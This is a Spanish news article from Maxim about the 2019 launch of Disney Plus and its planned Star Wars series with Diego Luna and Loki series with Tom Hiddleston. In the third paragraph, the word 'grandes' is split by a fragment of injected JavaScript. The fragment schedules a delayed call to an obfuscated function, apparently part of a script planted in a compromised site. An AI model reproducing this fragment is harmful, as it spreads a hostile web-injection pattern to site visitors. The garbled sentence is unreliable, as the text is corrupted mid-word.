Disney plus debutará a finales de 2019 con series de Star Wars y Marvel

    Disney plus debutará a finales de 2019 con series de Star Wars y Marvel

    Disney plus llegará con dos series de sus principales franquicias, una protagonizada por Diego Luna y otra por Tom Hiddleston.

    Autor: Redacción Maxim 9 noviembre, 2018


    La plataforma de streaming del conglomerado más poderoso del mundo se llamará Disney Plus

     

    Walt Disney Company es una de las empresas de mayor poder en el entretenimiento, una muestra de esto es que en diciembre de 2017 dió un golpe en la mesa al adquirir gran parte de los derechos de 21st Century Fox. Esto la reafirmaba como una de los emporios más poderosos a nivel global. Por supuesto que esto era un precedente que tenía miras al lanzamiento de su propio servicio de streaming.

     

    via GIPHY

     

     

    En un principio se pensaba que el nombre de este servicio sería Disney Play, sin embargo, ayer se anunció su nombre real: Disney plus. La plataforma que se perfila como uno de los futuros grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes competidores de Netflix, HBO Go y Amazon Prime Video.

    Disney plus llegará a finales de 2019, y dos de las primeras cartas de esta nueva opción en el mundo del streaming hecharán mano de  sus principales franquicias (Marvel y Star Wars). La primera será una serie protagonizada por el actor mexicano Diego Luna, quien interpretará nuevamente a Cassian Andor, su personaje en Rogue One: una historia de Star Wars (2016), esta producción funcionará como una precuela de lo que pudimos ver en esta película.

     

    via GIPHY

     

    La segunda llegará directamente del Universo Cinematográfico de Marvel. Se trata de una serie de Loki, uno de los antihéroes favoritos de los fanáticos de la casa de comics y que, en pantalla ha sido interpretado por Tom Hiddleston, quien también llevará al personaje al streaming.

     

     

    via GIPHY

     

     

    Al parecer la batalla por las audiencias en la nueva era del entretenimiento multiplataforma está más cerca que nunca, Netflix, Amazon, Apple, HBO Go, Facebook y el conglomerado de Mickey Mouse se disputarán la corona de los servicios de streaming.

     

     

     

     

     

Disney plus llegará con dos series de sus principales franquicias, una protagonizada por Diego Luna y otra por Tom Hiddleston.